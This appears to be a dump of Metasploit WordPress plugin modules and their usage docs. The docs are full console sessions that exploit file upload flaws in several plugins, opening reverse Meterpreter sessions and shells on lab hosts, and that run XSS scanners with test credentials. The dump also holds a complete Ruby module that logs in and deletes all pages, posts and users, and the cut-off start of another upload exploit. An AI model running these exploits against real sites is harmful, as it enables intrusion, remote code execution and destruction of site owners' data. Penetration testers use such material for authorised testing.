packages* 10 | 11 | 2.2.1 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msf > use exploit/unix/webapp/wp_frontend_editor_file_upload 18 | msf exploit(wp_frontend_editor_file_upload) > show options 19 | 20 | Module options (exploit/unix/webapp/wp_frontend_editor_file_upload): 21 | 22 | Name Current Setting Required Description 23 | ---- --------------- -------- ----------- 24 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 25 | RHOST yes The target address 26 | RPORT 80 yes The target port 27 | TARGETURI / yes The base path to the wordpress application 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 Front-End Editor 2.2.1 36 | 37 | 38 | msf exploit(wp_frontend_editor_file_upload) > info 39 | 40 | Name: WordPress Front-end Editor File Upload 41 | Module: exploit/unix/webapp/wp_frontend_editor_file_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2012-07-04 47 | 48 | Provided by: 49 | Sammy 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 Front-End Editor 2.2.1 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | The WordPress Front-end Editor plugin contains an authenticated file 70 | upload vulnerability. We can upload arbitrary files to the upload 71 | folder, because the plugin also uses it's own file upload mechanism 72 | instead of the wordpress api it's possible to upload any file type. 73 | 74 | References: 75 | http://www.osvdb.org/83637 76 | https://wpvulndb.com/vulnerabilities/7569 77 | http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html 78 | 79 | msf exploit(wp_frontend_editor_file_upload) > set RHOST 192.168.1.31 80 | RHOST => 192.168.1.31 81 | msf exploit(wp_frontend_editor_file_upload) > check 82 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 83 | msf exploit(wp_frontend_editor_file_upload) > exploit 84 | 85 | [*] Started reverse handler on 192.168.1.37:4444 86 | [*] 192.168.1.31:80 - Trying to upload payload 87 | [*] 192.168.1.31:80 - Uploading payload 88 | [*] 192.168.1.31:80 - Calling uploaded file kgdmn.php 89 | [*] Sending stage (40499 bytes) to 192.168.1.31 90 | [*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51677) at 2015-04-25 21:57:59 -0300 91 | [+] Deleted kgdmn.php 92 | 93 | meterpreter > sysinfo 94 | Computer : msfdevel 95 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 96 | Meterpreter : php/php 97 | meterpreter > shell 98 | Process 9646 created. 99 | Channel 0 created. 100 | 101 | id 102 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 103 | 104 | ``` 105 | -------------------------------------------------------------------------------- /documentation/exploits/wp_ultimate_product_catalogue_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Ultimate Product Catalogue File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin 'Ultimate Product Catalogue' 3.1.1 4 | Homepage: https://wordpress.org/plugins/ultimate-product-catalogue 5 | Source Code: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.1.zip 6 | Active Installs: 4,000+ 7 | References: https://wpvulndb.com/vulnerabilities/7939 8 | 9 | #### Vulnerable packages* 10 | 11 | 3.1.1 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msf > use exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload 18 | msf exploit(wp_ultimate_product_catalogue_file_upload) > show options 19 | 20 | Module options (exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload): 21 | 22 | Name Current Setting Required Description 23 | ---- --------------- -------- ----------- 24 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 25 | RHOST yes The target address 26 | RPORT 80 yes The target port 27 | TARGETURI / yes The base path to the wordpress application 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 WP Ultimate Product Caatalogue 3.1.1 36 | 37 | 38 | msf exploit(wp_ultimate_product_catalogue_file_upload) > info 39 | 40 | Name: WordPress Ultimate Product Catalogue Upload Vulnerability 41 | Module: exploit/unix/webapp/wp_ultimate_product_catalogue_file_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2015-04-22 47 | 48 | Provided by: 49 | Luca Ercoli 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 WP Ultimate Product Caatalogue 3.1.1 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | This module exploits an arbitrary PHP code upload in the WordPress 70 | Ultimate Product Catalogue version 3.1.1. The vulnerability allows 71 | for arbitrary file upload and remote code execution. 72 | 73 | References: 74 | http://www.osvdb.org/121164 75 | https://wpvulndb.com/vulnerabilities/7939 76 | http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/ 77 | 78 | msf exploit(wp_ultimate_product_catalogue_file_upload) > set RHOST 10.10.10.20 79 | RHOST => 10.10.10.20 80 | msf exploit(wp_ultimate_product_catalogue_file_upload) > check 81 | [*] 10.10.10.20:80 - The target service is running, but could not be validated. # off-line 82 | msf exploit(wp_ultimate_product_catalogue_file_upload) > exploit 83 | 84 | [*] Started reverse handler on 10.10.10.10:4444 85 | [+] 10.10.10.20:80 - Our payload is at: sAFMmSeoG.php. 86 | [*] 10.10.10.20:80 - Calling payload... 87 | [*] Sending stage (40499 bytes) to 10.10.10.20 88 | [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.10.10.20:52049) at 2015-04-27 15:34:42 -0300 89 | [+] Deleted sAFMmSeoG.php 90 | 91 | meterpreter > sysinfo 92 | Computer : msfdevel 93 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 94 | Meterpreter : php/php 95 | meterpreter > shell 96 | Process 5899 created. 97 | Channel 0 created. 98 | 99 | id 100 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 101 | 102 | ``` 103 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_visual_form_builder_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Visual Form Builder XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'Visual Form Builder' 2.8.2 4 | Homepage: https://wordpress.org/plugins/visual-form-builder/ 5 | Source Code: https://downloads.wordpress.org/plugin/visual-form-builder.2.8.2.zip 6 | References: https://wpvulndb.com/vulnerabilities/7991 7 | Active Install: +100.000 8 | 9 | #### Vulnerable packages* 10 | 11 | 2.8.2 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 14.04.2 LTS): 16 | ``` 17 | msf > use auxiliary/scanner/http/wp_visual_form_builder_xss_scanner 18 | msf auxiliary(wp_visual_form_builder_xss_scanner) > info 19 | 20 | Name: WordPress Visual Form Builder Plugin XSS Scanner 21 | Module: auxiliary/scanner/http/wp_visual_form_builder_xss_scanner 22 | License: Metasploit Framework License (BSD) 23 | Rank: Normal 24 | Disclosed: 2015-05-15 25 | 26 | Provided by: 27 | Tim Coen 28 | Roberto Soares Espreto 29 | 30 | Basic options: 31 | Name Current Setting Required Description 32 | ---- --------------- -------- ----------- 33 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 34 | RHOSTS yes The target address range or CIDR identifier 35 | RPORT 80 yes The target port 36 | TARGETURI / yes The base path to the wordpress application 37 | THREADS 1 yes The number of concurrent threads 38 | VHOST no HTTP server virtual host 39 | WP_PASSWORD yes Valid password for the provided username 40 | WP_USER yes A valid username 41 | 42 | Description: 43 | This module attempts to exploit a authenticated Cross-Site Scripting 44 | in Visual Form Builder Plugin for WordPress, version 2.8.2 and 45 | likely prior in order if the instance is vulnerable. 46 | 47 | References: 48 | https://wpvulndb.com/vulnerabilities/7991 49 | http://software-talk.org/blog/2015/05/sql-injection-reflected-xss-visual-form-builder-wordpress-plugin/ 50 | 51 | msf auxiliary(wp_visual_form_builder_xss_scanner) > show options 52 | 53 | Module options (auxiliary/scanner/http/wp_visual_form_builder_xss_scanner): 54 | 55 | Name Current Setting Required Description 56 | ---- --------------- -------- ----------- 57 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 58 | RHOSTS yes The target address range or CIDR identifier 59 | RPORT 80 yes The target port 60 | TARGETURI / yes The base path to the wordpress application 61 | THREADS 1 yes The number of concurrent threads 62 | VHOST no HTTP server virtual host 63 | WP_PASSWORD yes Valid password for the provided username 64 | WP_USER yes A valid username 65 | 66 | msf auxiliary(wp_visual_form_builder_xss_scanner) > set RHOSTS 192.168.1.38 67 | RHOSTS => 192.168.1.38 68 | msf auxiliary(wp_visual_form_builder_xss_scanner) > set WP_USER espreto 69 | WP_USER => espreto 70 | msf auxiliary(wp_visual_form_builder_xss_scanner) > set WP_PASSWORD dvd43145 71 | WP_PASSWORD => dvd43145 72 | msf auxiliary(wp_visual_form_builder_xss_scanner) > run 73 | 74 | [*] 192.168.1.38:80 - Trying to login as espreto 75 | [+] 192.168.1.38:80 - Login successful 76 | [+] 192.168.1.38:80 - Vulnerable to Cross-Site Scripting the "Visual Form Builder 2.8.2" plugin for WordPress 77 | [+] Save in: /home/espreto/.msf4/local/43225550.html 78 | [*] Scanned 1 of 1 hosts (100% complete) 79 | [*] Auxiliary module execution completed 80 | msf auxiliary(wp_visual_form_builder_xss_scanner) > firefox /home/espreto/.msf4/local/43225550.html 81 | [*] exec: firefox /home/espreto/.msf4/local/43225550.html 82 | 83 | ``` 84 | This will open the browser: 85 | 86 | ![XSS](../images/wp_visual_form_builder_xss_scanner.jpg) 87 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_eshop_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress eShop XSS Vulnerability. 2 | 3 | Application: WordPress Plugin eShop 6.3.13 4 | Homepage: https://wordpress.org/plugins/eshop/ 5 | Source Code: https://downloads.wordpress.org/plugin/eshop.6.3.13.zip 6 | References: https://wpvulndb.com/vulnerabilities/8180 7 | 8 | #### Vulnerable packages* 9 | 10 | 6.3.13 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_eshop_xss_scanner 17 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) show options 18 | 19 | Module options (auxiliary/scanner/http/wp_eshop_xss_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOSTS yes The target address range or CIDR identifier 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | THREADS 1 yes The number of concurrent threads 28 | VHOST no HTTP server virtual host 29 | WP_PASSWORD yes A valid password 30 | WP_USERNAME yes A valid username 31 | 32 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) info 33 | 34 | Name: WordPress eShop XSS Scanner 35 | Module: auxiliary/scanner/http/wp_eshop_xss_scanner 36 | License: Metasploit Framework License (BSD) 37 | Rank: Normal 38 | Disclosed: 2015-09-04 39 | 40 | Provided by: 41 | Ehsan Hosseini 42 | Roberto Soares Espreto 43 | 44 | Basic options: 45 | Name Current Setting Required Description 46 | ---- --------------- -------- ----------- 47 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 48 | RHOSTS yes The target address range or CIDR identifier 49 | RPORT 80 yes The target port 50 | TARGETURI / yes The base path to the wordpress application 51 | THREADS 1 yes The number of concurrent threads 52 | VHOST no HTTP server virtual host 53 | WP_PASSWORD yes A valid password 54 | WP_USERNAME yes A valid username 55 | 56 | Description: 57 | This module attempts to exploit a Cross-Site Scripting in eShop 58 | Plugin for WordPress, version 6.3.13 and likely prior in order if 59 | the instance is vulnerable. 60 | 61 | References: 62 | https://packetstormsecurity.com/files/133480 63 | https://wpvulndb.com/vulnerabilities/8180 64 | 65 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set RHOSTS 10.10.10.20 66 | RHOSTS => 10.10.10.20 67 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set WP_USERNAME espreto 68 | WP_USERNAME => espreto 69 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) set WP_PASSWORD P@ssw0rd 70 | WP_PASSWORD => P@ssw0rd 71 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) check 72 | [*] 10.10.10.20:80 - The target appears to be vulnerable. 73 | [*] Checked 1 of 1 hosts (100% complete) 74 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) run 75 | 76 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the eShop 6.3.13 plugin for WordPress 77 | [+] Save in: /home/espreto/.msf4/local/79818718.html 78 | [*] Scanned 1 of 1 hosts (100% complete) 79 | [*] Auxiliary module execution completed 80 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_eshop_xss_scanner) firefox /home/espreto/.msf4/local/79818718.html 81 | [*] exec: firefox /home/espreto/.msf4/local/79818718.html 82 | ``` 83 | 84 | This will open the browser: 85 | 86 | ![XSS](../images/wp_eshop_xss_scanner.png) 87 | -------------------------------------------------------------------------------- /documentation/exploits/wp_woocommerce_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress WooCommerce Amazon Affiliates 7.0 Upload Vulnerability. 2 | 3 | Application: WordPress WooCommerce Amazon Affiliates 4 | Homepage: http://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503 5 | Reference: https://wpvulndb.com/vulnerabilities/7940 6 | 7 | #### Vulnerable packages* 8 | 9 | 7.0 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msf > use exploit/unix/webapp/wp_woocommerce_file_upload 16 | msf exploit(wp_woocommerce_file_upload) > show options 17 | 18 | Module options (exploit/unix/webapp/wp_woocommerce_file_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | KEY c125a47cba1e8ec73945dd622d142f79 yes A valid key on the target host 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | VHOST no HTTP server virtual host 28 | 29 | 30 | Exploit target: 31 | 32 | Id Name 33 | -- ---- 34 | 0 WooCommerce Amazon Affiliates 7.0 35 | 36 | 37 | msf exploit(wp_woocommerce_file_upload) > info 38 | 39 | Name: WordPress WooCommerce Amazon Affiliates Upload Vulnerability 40 | Module: exploit/unix/webapp/wp_woocommerce_file_upload 41 | Platform: PHP 42 | Privileged: No 43 | License: Metasploit Framework License (BSD) 44 | Rank: Excellent 45 | Disclosed: 2015-04-01 46 | 47 | Provided by: 48 | Evex_1337 49 | Roberto Soares Espreto 50 | 51 | Available targets: 52 | Id Name 53 | -- ---- 54 | 0 WooCommerce Amazon Affiliates 7.0 55 | 56 | Basic options: 57 | Name Current Setting Required Description 58 | ---- --------------- -------- ----------- 59 | KEY c125a47cba1e8ec73945dd622d142f79 yes A valid key on the target host 60 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 61 | RHOST yes The target address 62 | RPORT 80 yes The target port 63 | TARGETURI / yes The base path to the wordpress application 64 | VHOST no HTTP server virtual host 65 | 66 | Payload information: 67 | 68 | Description: 69 | This module exploits an arbitrary file upload in the WordPress 70 | WooCommerce Amazon Affiliates version 7.0. It allows to upload 71 | arbitrary php files and get remote code execution. This module has 72 | been tested successfully on WordPress 4.2.1 on Ubuntu 14.04 Server. 73 | 74 | References: 75 | https://wpvulndb.com/vulnerabilities/7940 76 | http://packetstormsecurity.com/files/131629/ 77 | http://research.evex.pw/?vuln=13 78 | 79 | msf exploit(wp_woocommerce_file_upload) > set RHOST 192.168.1.31 80 | RHOST => 192.168.1.31 81 | msf exploit(wp_woocommerce_file_upload) > exploit 82 | 83 | [*] Started reverse handler on 192.168.1.37:4444 84 | [+] 192.168.1.31:80 - Injecting payload... 85 | [*] 192.168.1.31:80 - Calling payload... 86 | [*] Sending stage (40499 bytes) to 192.168.1.31 87 | [*] Meterpreter session 9 opened (192.168.1.37:4444 -> 192.168.1.31:41528) at 2015-05-08 02:37:07 -0300 88 | [+] Restored original content. 89 | 90 | meterpreter > sysinfo 91 | Computer : msfdevel 92 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 93 | Meterpreter : php/php 94 | meterpreter > shell 95 | Process 18718 created. 96 | Channel 0 created. 97 | 98 | id 99 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 100 | 101 | ``` 102 | -------------------------------------------------------------------------------- /modules/auxiliary/dos/http/wp_bulk_delete_dos.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | include Msf::Exploit::Remote::HTTP::Wordpress 10 | 11 | def initialize(info = {}) 12 | super(update_info(info, 13 | 'Name' => 'Bulk Delete DoS', 14 | 'Description' => %q{ 15 | Will delete most of the website content if vulnerable, including posts, pages and users 16 | }, 17 | 'Author' => ['Panagiotis Vagenas '], 18 | 'License' => MSF_LICENSE, 19 | 'References' => [ 20 | 'URL' => 'http://pvagenas.com/vulnerabilities/bulk-delete-privilege-escalation/' 21 | ], 22 | 'DisclosureDate' => 'Mar 02 2016' 23 | )) 24 | 25 | register_options( 26 | [ 27 | OptString.new('USERNAME', [true, 'The username to authenticate with']), 28 | OptString.new('PASSWORD', [true, 'The password to authenticate with']) 29 | ], self.class) 30 | end 31 | 32 | def check 33 | check_plugin_version_from_readme('bulk-delete', '5.5.4') 34 | end 35 | 36 | def username 37 | datastore['USERNAME'] 38 | end 39 | 40 | def password 41 | datastore['PASSWORD'] 42 | end 43 | 44 | 45 | def do_action(action, data) 46 | res = send_request_cgi( 47 | 'method' => 'POST', 48 | 'uri' => normalize_uri(wordpress_url_backend, 'index.php'), 49 | 'vars_get' => {bd_action: action}, 50 | 'vars_post' => data, 51 | 'cookie' => @cookie 52 | ) 53 | 54 | if res.nil? 55 | vprint_error('No response from the target.') 56 | elsif res.code != 200 57 | vprint_warning("Server responded with status code #{res.code}") 58 | end 59 | 60 | res 61 | end 62 | 63 | def run 64 | print_status("Authenticating with WordPress using #{username}:#{password}...") 65 | 66 | @cookie = wordpress_login(username, password) 67 | if @cookie.nil? 68 | print_error('Failed to authenticate with WordPress') 69 | return false 70 | end 71 | 72 | print_good('Authenticated with WordPress') 73 | 74 | print_status('Deleting all pages') 75 | r = do_action('delete_pages_by_status', { 76 | smbd_pages_force_delete: 'true', 77 | smbd_published_pages: 'published_pages', 78 | smbd_draft_pages: 'draft_pages', 79 | smbd_pending_pages: 'pending_pages', 80 | smbd_future_pages: 'future_pages', 81 | smbd_private_pages: 'private_pages' 82 | }) 83 | 84 | if r.nil? or r.code != 200 85 | print_error('Failed to delete all pages, maybe target is not vulnerable') 86 | else 87 | vprint_good("Deleting all pages returned status code #{r.code}") 88 | end 89 | 90 | print_status('Deleting all posts from all default post types') 91 | 92 | %w(post page attachment revision nav_menu_item).each { |a| 93 | vprint_status("Deleting all posts from post type #{a}") 94 | 95 | r = do_action('delete_posts_by_post_type', {'smbd_types[0]' => "#{a}"}) 96 | 97 | if r.nil? or r.code != 200 98 | vprint_error("Failed to delete all posts from post type #{a}") 99 | else 100 | vprint_good("Deleting all posts returned status code #{r.code}") 101 | end 102 | } 103 | 104 | print_status('Deleting all users') 105 | 106 | r = do_action('delete_users_by_meta', { 107 | smbd_u_meta_key: 'nickname', 108 | smbd_u_meta_compare: 'LIKE', 109 | smbd_u_meta_value: '' 110 | }) 111 | 112 | if r.nil? or r.code != 200 113 | print_error('Failed to delete all posts, maybe target is not vulnerable') 114 | else 115 | vprint_good("Deleting all users returned status code #{r.code}") 116 | end 117 | 118 | print_status('Exploitation complete, please check output for details') 119 | 120 | end 121 | 122 | end 123 | -------------------------------------------------------------------------------- /documentation/exploits/wp_slideshowgallery_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress SlideShow Gallery 1.4.6 Shell Upload. 2 | 3 | Application: WordPress Tribulant Slideshow Gallery 4 | Homepage: https://wordpress.org/plugins/slideshow-gallery/ 5 | Source Code: https://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip 6 | 7 | #### Vulnerable packages* 8 | 9 | 1.4.6 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msf > use exploit/unix/webapp/wp_slideshowgallery_upload 16 | msf exploit(wp_slideshowgallery_upload) > show options 17 | 18 | Module options (exploit/unix/webapp/wp_slideshowgallery_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | PASSWORD yes Valid password for the provided username 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOST yes The target address 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | USER yes A valid username 28 | VHOST no HTTP server virtual host 29 | 30 | 31 | Exploit target: 32 | 33 | Id Name 34 | -- ---- 35 | 0 WP SlideShow Gallery 1.4.6 36 | 37 | 38 | msf exploit(wp_slideshowgallery_upload) > info 39 | 40 | Name: WordPress SlideShow Gallery Authenticated File Upload 41 | Module: exploit/unix/webapp/wp_slideshowgallery_upload 42 | Platform: PHP 43 | Privileged: No 44 | License: Metasploit Framework License (BSD) 45 | Rank: Excellent 46 | Disclosed: 2014-08-28 47 | 48 | Provided by: 49 | Jesus Ramirez Pichardo 50 | Roberto Soares Espreto 51 | 52 | Available targets: 53 | Id Name 54 | -- ---- 55 | 0 WP SlideShow Gallery 1.4.6 56 | 57 | Basic options: 58 | Name Current Setting Required Description 59 | ---- --------------- -------- ----------- 60 | PASSWORD yes Valid password for the provided username 61 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 62 | RHOST yes The target address 63 | RPORT 80 yes The target port 64 | TARGETURI / yes The base path to the wordpress application 65 | USER yes A valid username 66 | VHOST no HTTP server virtual host 67 | 68 | Payload information: 69 | 70 | Description: 71 | The WordPress SlideShow Gallery plugin contains an auhtenticated 72 | file upload vulnerability. We can upload arbitrary files to the 73 | upload folder, because the plugin uses it's own file upload 74 | mechanism instead of the wordpress api it's possible to upload any 75 | file type. The user provided does not need special rights, and users 76 | with "Contributor" role can be abused. 77 | 78 | References: 79 | http://cvedetails.com/cve/2014-5460/ 80 | http://www.exploit-db.com/exploits/34681/ 81 | 82 | msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.1.31 83 | RHOST => 192.168.1.31 84 | msf exploit(wp_slideshowgallery_upload) > set USER espreto 85 | USER => espreto 86 | msf exploit(wp_slideshowgallery_upload) > set PASSWORD xxxxxxx 87 | PASSWORD => dvd43145 88 | msf exploit(wp_slideshowgallery_upload) > exploit 89 | 90 | [*] Started reverse handler on 192.168.1.46:4444 91 | [*] 192.168.1.31:80 - Trying to login as espreto 92 | [*] 192.168.1.31:80 - Trying to upload payload 93 | [*] 192.168.1.31:80 - Uploading payload 94 | [*] 192.168.1.31:80 - Calling uploaded file tfyteogt.php 95 | [*] Sending stage (40499 bytes) to 192.168.1.31 96 | [*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40298) at 2015-04-13 03:46:36 -0300 97 | [+] Deleted tfyteogt.php 98 | 99 | meterpreter > sysinfo 100 | Computer : msfdevel 101 | OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 102 | Meterpreter : php/php 103 | meterpreter > 104 | ``` 105 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_social_media_and_share_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Ultimate Social Media XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'Ultimate Social Media' 1.1.1.11 4 | Homepage: https://wordpress.org/plugins/ultimate-social-media-icons/ 5 | Source Code: https://downloads.wordpress.org/plugin/ultimate-social-media-icons.1.1.1.11.zip 6 | References: https://wpvulndb.com/vulnerabilities/8231 7 | Active Installs: 60,000+ 8 | 9 | #### Vulnerable packages* 10 | 11 | 1.1.1.11 12 | 13 | #### Usage: 14 | 15 | ##### Linux (Ubuntu 12.04.5 LTS): 16 | ``` 17 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_social_media_and_share_xss_scanner 18 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) info 19 | 20 | Name: WordPress Social Media and Share Icons XSS Scanner 21 | Module: auxiliary/scanner/http/wp_social_media_and_share_xss_scanner 22 | License: Metasploit Framework License (BSD) 23 | Rank: Normal 24 | Disclosed: 2015-11-22 25 | 26 | Provided by: 27 | g0blin 28 | Roberto Soares Espreto 29 | 30 | Basic options: 31 | Name Current Setting Required Description 32 | ---- --------------- -------- ----------- 33 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 34 | RHOSTS yes The target address range or CIDR identifier 35 | RPORT 80 yes The target port 36 | TARGETURI / yes The base path to the wordpress application 37 | THREADS 1 yes The number of concurrent threads 38 | VHOST no HTTP server virtual host 39 | WP_PASS yes A valid password 40 | WP_USER yes A valid username 41 | 42 | Description: 43 | This module attempts to exploit an Authenticated Cross-Site 44 | Scripting in Social Media and Share Icons Plugin for WordPress, 45 | version 1.1.1.11 and likely prior in order if the instance is 46 | vulnerable. 47 | 48 | References: 49 | https://wpvulndb.com/vulnerabilities/8231 50 | https://research.g0blin.co.uk/g0blin-00052/ 51 | 52 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) show options 53 | 54 | Module options (auxiliary/scanner/http/wp_social_media_and_share_xss_scanner): 55 | 56 | Name Current Setting Required Description 57 | ---- --------------- -------- ----------- 58 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 59 | RHOSTS yes The target address range or CIDR identifier 60 | RPORT 80 yes The target port 61 | TARGETURI / yes The base path to the wordpress application 62 | THREADS 1 yes The number of concurrent threads 63 | VHOST no HTTP server virtual host 64 | WP_PASS yes A valid password 65 | WP_USER yes A valid username 66 | 67 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set RHOSTS 192.168.0.14 68 | RHOSTS => 192.168.0.14 69 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set WP_USER espreto 70 | WP_USER => espreto 71 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) set WP_PASS wp@2015 72 | WP_PASS => wp@2015 73 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) check 74 | [*] 192.168.0.14:80 - The target appears to be vulnerable. 75 | [*] Checked 1 of 1 hosts (100% complete) 76 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) run 77 | 78 | [+] 192.168.0.14:80 - Vulnerable to Cross-Site Scripting the Ultimate Social Media 1.1.1.11 plugin for WordPress 79 | [+] Save in: /home/espreto/.msf4/local/32395811.html 80 | [*] Scanned 1 of 1 hosts (100% complete) 81 | [*] Auxiliary module execution completed 82 | msfdevel 192.168.0.5 shell[s]:0 job[s]:0 msf> auxiliary(wp_social_media_and_share_xss_scanner) 83 | ``` 84 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary file upload in the WordPress Ajax Load More 19 | version 2.8.1.1. It allows to upload arbitrary php files and get remote code 20 | execution. This module has been tested successfully on WordPress Ajax Load More 21 | 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server. 22 | }, 23 